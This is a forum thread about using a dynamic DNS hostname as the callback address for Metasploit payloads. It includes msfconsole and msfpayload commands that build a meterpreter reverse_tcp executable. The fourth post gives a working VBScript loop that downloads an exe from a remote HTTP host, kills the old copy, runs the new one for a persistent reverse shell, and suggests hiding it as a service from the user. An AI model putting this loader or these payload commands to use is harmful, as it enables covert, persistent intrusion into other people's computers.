Results 1 to 5 of 5

Thread: Metasploit: is it possible to use DNS or NETBIOS names for LHOST?

  1. #1
    Junior Member
    Join Date
    Jan 2010
    Posts
    31

    Default Metasploit: is it possible to use DNS or NETBIOS names for LHOST?

    When setting a DNS name "e.g. pentester.dyndns.org" or NetBIOS name "e.g. pentester-pc" as the LHOST, it doesn't work:
    Code:
    msf exploit(adobe_media_newplayer) > set LHOST penteseter.dyndns.org
    LHOST => penteseter.dyndns.org
    msf exploit(adobe_media_newplayer) > exploit
    
    [-] Exploit failed: The following options failed to validate: LHOST.
    is there a way to use anything other than IPs for LHOST?

    Thanks in advance.

  2. #2
    Just burned his ISO
    Join Date
    Dec 2009
    Posts
    5

    Default

    I am wondering the same. What do you do when you have a dynamic IP that can change daily? I hate going to sleep and waking up to finish what I was testing just to find that my IP has changed and I have to reconfigure everything again.
    my exact situation is I have two computers with one running windows 7 and the other xp. I also have two different routers I am using for each computer. I am trying to use the new adobe exploit to see if I can take over the windows 7 machine by just opening a pdf on it. I have set up port forwarding on the xp machine to forward the connection to the handler on the xp machine. I would like to set up the exploit pdf to be able to keep being used even when my xp machine gets a new ip from the isp's dns without having to keep making new ones.

  3. #3
    Just burned his ISO
    Join Date
    Dec 2009
    Posts
    5

    Default

    it looked like it was working in the console when i tried it, but when I tried to make an exe i got this.

    Code:
    $ msfpayload windows/meterpreter/reverse_tcp lhost=this.iswhere.ihadmy.notshowingyou.com lport=443 x>test.exe
    /msf3/lib/rex/socket.rb:160:in `gethostbyname': getaddrinfo: hostname nor servname provided, or not known (SocketError)
            from /msf3/lib/rex/socket.rb:160:in `gethostbyname'
            from /msf3/lib/rex/socket.rb:193:in `resolv_nbo'
            from /msf3/lib/msf/core/payload.rb:306:in `block in substitute_vars'
            from /msf3/lib/msf/core/payload.rb:285:in `each_pair'
            from /msf3/lib/msf/core/payload.rb:285:in `substitute_vars'
            from /msf3/lib/msf/core/payload.rb:545:in `internal_generate'
            from /msf3/lib/msf/core/payload.rb:262:in `generate'
            from /msf3/lib/msf/core/payload.rb:163:in `size'
            from /msf3/lib/msf/core/payload_set.rb:168:in `block (2 levels) in recalculate'
            from /msf3/lib/msf/core/payload_set.rb:113:in `each_pair'
            from /msf3/lib/msf/core/payload_set.rb:113:in `block in recalculate'
            from /msf3/lib/msf/core/payload_set.rb:109:in `each_pair'
            from /msf3/lib/msf/core/payload_set.rb:109:in `recalculate'
            from /msf3/lib/msf/core/module_manager.rb:866:in `block in load_modules'
            from /msf3/lib/msf/core/module_manager.rb:866:in `each_key'
            from /msf3/lib/msf/core/module_manager.rb:866:in `load_modules'
            from /msf3/lib/msf/core/module_manager.rb:632:in `add_module_path'
            from /msf3/lib/msf/base/simple/framework.rb:107:in `simplify'
            from /msf3/lib/msf/base/simple/framework.rb:70:in `create'
            from /msf3/msfpayload:36:in `<main>'
    I am wondering if it just pulls the dns at creating time and still puts a ip in there or if it actually will use the dns at run time to get the ip.

  4. #4
    Just burned his ISO
    Join Date
    Dec 2009
    Posts
    5

    Default

    according to this
    spool. metasploit. com
    /pipermail/framework/ 2009-September/009646.html

    (remove spaces)
    metasploit stores only an IP in the payload not the raw url. it resolves the dns at the time the exploit is created.
    my problem is what if a payload needs to stay on a system where you can't get a new one on it. also what if you need a reverse connection and the ip of the computer it connects to is not static. without rewriting the payloads to resolve dns names here is my solution.
    it involves a target being a windows system without restrictions on external connections. this is very visible on the logs of any it admins who looks at the network though. a very ugly way to do it but it gets the job done.

    first off i set up a http file host with a dynamic dns provider and placed an updated meterpreter payload encoded as a standalone exe that has the current ip set as the LHOST. this file can be changed as your LHOST ip changes.
    I then cobbled together this vbs script from several sources. it can use alot of work but it does the basic job now.
    ' Set your settings
    DURL = "file in url here as the forum made me change it"
    SLocation = "c:\c\update.exe"
    LCount = 50

    state = 1
    While state = 1
    if LCount = 50 then
    strComputer = "."
    Set objWMIService = GetObject("winmgmts:" _
    & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
    Set colProcessList = objWMIService.ExecQuery _
    ("SELECT * FROM Win32_Process WHERE Name = 'update.exe'")
    For Each objProcess in colProcessList
    objProcess.Terminate()
    Next
    Call FileFetch(DURL, SLocation)
    LCount = 0
    End if
    Set WshShell = WScript.CreateObject ("WScript.Shell")
    Set colProcessList = GetObject("Winmgmts:").ExecQuery ("Select * from Win32_Process")
    For Each objProcess in colProcessList
    if objProcess.name = "update.exe" then
    vFound = True
    End if
    Next
    If vFound = True then
    wscript.sleep 5000
    Else
    WshShell.Run ("c:\c\update.exe")
    wscript.sleep 500000
    End If
    vFound = False
    LCount = LCount + 1

    Wend





    Public Function FileFetch(strFileURL, strHDLocation)


    ' Fetch the file
    Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")

    objXMLHTTP.open "GET", strFileURL, false
    objXMLHTTP.send()

    If objXMLHTTP.Status = 200 Then
    Set objADOStream = CreateObject("ADODB.Stream")
    objADOStream.Open
    objADOStream.Type = 1 'adTypeBinary

    objADOStream.Write objXMLHTTP.ResponseBody
    objADOStream.Position = 0 'Set the stream position to the start

    Set objFSO = Createobject("Scripting.FileSystemObject")
    If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation
    Set objFSO = Nothing

    objADOStream.SaveToFile strHDLocation
    objADOStream.Close
    Set objADOStream = Nothing
    End if

    Set objXMLHTTP = Nothing
    End Function
    as you can see this will download an exe shellcode and run it from the http site.
    you would not want to use this as a normal access shell since it will periodically kill it off and restart it but you can use this to upload and spawn a new shell as needed for regular access. every so often this will make a call out to you so you just keep your handler open and wait for it when you want to reconnect to this computer.

    this could be improved by changing the script to check another file also served with a version number and only killing off the shell and redownloading and spawning a new one when the http file host shows a bigger version number than the current one.
    you can stuff this into an exe and set it as a service to hide it from the user if you want also.

  5. #5
    Junior Member
    Join Date
    Jan 2010
    Posts
    31

    Default

    Wow!
    Will give it a try...
    Thanks for the help..

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •